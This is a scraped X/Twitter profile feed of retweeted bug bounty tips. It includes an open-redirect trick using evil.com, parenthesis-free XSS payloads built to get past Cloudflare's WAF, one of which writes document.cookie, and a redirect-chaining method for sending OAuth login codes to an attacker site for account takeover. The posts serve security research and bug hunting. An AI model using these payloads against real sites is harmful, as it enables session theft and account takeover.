Ahmed

20 posts

Ahmed

Ahmed

@bittime_id

Katılım Mayıs 2023
67 Takip Edilen40 Takipçiler
Ahmed retweetledi
0xHun73r
0xHun73r@0xHun73r·
Alhamdulillah, just discovered a new bug! -Tip: When hunting Open Redirects, try inserting //evil.com/..;/css in the URL The server treats it as a local path but the browser redirects outside Add a .js or .css file at the end. #CyberSecurity #Hacker101 #bugbountytips #BugBounty
0xHun73r tweet media
English
2
29
228
10.5K
Ahmed
Ahmed@bittime_id·
@coffinxp7 Yes but are you using traslation tool?🤣🤣
English
1
0
0
309
Coffin
Coffin@lostsec_·
i don't have account on BreachFourm. so don't believe it someone just impersonating me..
Coffin tweet media
English
10
3
113
13.4K
Novran.
Novran.@xchopath·
Another XSS w/o Parentheses to Bypass Cloudflare Ngl, this one is still working since 2020 tho... twitter.com/cookiehanhoan/… Modify it a bit to execute via Open Redirect: javascript:_=alert+0;Array.prototype[Symbol.hasInstance]=eval,/alert/.source+_[14]+/1/+_[15]instanceof[]
Novran. tweet mediaNovran. tweet media
Harry Ha@cookiehanhoan

Cloudflare #WAF Bypass XSS Without parentheses () Thank you Checkpoint, and a special shout-out to bro Hiendv for an amazing technique bypassing Cloudflare WAF. #bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity #ethicalhacking #bypasswaf #cloudflare

English
2
0
6
1.2K
Novran.
Novran.@xchopath·
Nuclei is not just a "-u" This is just my personal note...
Novran. tweet media
English
3
1
47
3.9K
Ahmed retweetledi
./Mr-Dark
./Mr-Dark@Mr_Dark55·
Bypassing WAF through a large number of characters is a successful method
English
16
162
875
60.5K
Ahmed retweetledi
X
X@TheMsterDoctor1·
X tweet media
English
16
489
1.5K
183.4K
Ahmed retweetledi
Jayesh Madnani
Jayesh Madnani@Jayesh25·
🔐💰 Question of the day: How can you maximize payouts for "Low" risk open redirect issues? 🤑 I've personally earned over $30,000 in bounties by chaining open redirect submissions to ATOs. These "Low" severity bugs can often be escalated through a double redirection, resulting in bounties ranging from $750 to $5000, depending on the program. Open redirects can be chained with legitimate redirects, allowing attackers to exfiltrate OAuth codes and tokens for potential account takeovers. Here's the quick breakdown: (1) Find a low-severity open redirect, for example: example.com/next-step?url=…. (2) Look for site login functionality on core domains or subdomains. Assuming login is integrated with Auth0 or another equivalent service provider at login.example.com. In such cases, a valid redirect would usually look something like login.example.com/?redirect_uri= (3) You can now chain the vulnerable open redirect identified in step 1 with the login page and still be able to exfiltrate the login code in most cases. For example, you could craft a URI like login.example.com/?redirect_uri=… When a victim navigates to the above link and logs in, upon successful login, it will redirect them in this flow to the attacker controlled site: login.example.com -> (First Redirect) example.com/next-step?code…: -> (Second Redirect) attackersite.com/?code=:loginco…: As a result, this ultimately leads to the leakage of Auth0 or other equivalent codes/tokens to an attacker-controlled server, resulting in an ATO. Common mistakes: Reporting open redirects as simple issues without escalating their impact. Don't underestimate their potential. Always look for ways to level up! 💡 #BugBounty #InfoSec #openredirect #cybersecurity #bugbountytips #hackerone #bugcrowd,#securitytips,#questionoftheday
English
22
102
488
37.2K
Ahmed retweetledi
Michael Blake
Michael Blake@Michael1026H1·
If you want to be good at finding XSS, you need to understand how HTML/javascript work. Copying/pasting a payload everywhere works for some cases, but you'd be missing a lot of cases. What's filtered, your context, and what's possible with this combination are extremely important
English
5
14
71
0
Ahmed retweetledi
c0mr3x
c0mr3x@c0mr3x·
Found XSS in private bug-bounty .. document was filtered, so as () .. my final payload -> javascript:setTimeout`\x64ocument.write\x28\x64ocument.\x63ookie\x29` #bugbountytip #BugBounty
English
1
44
135
0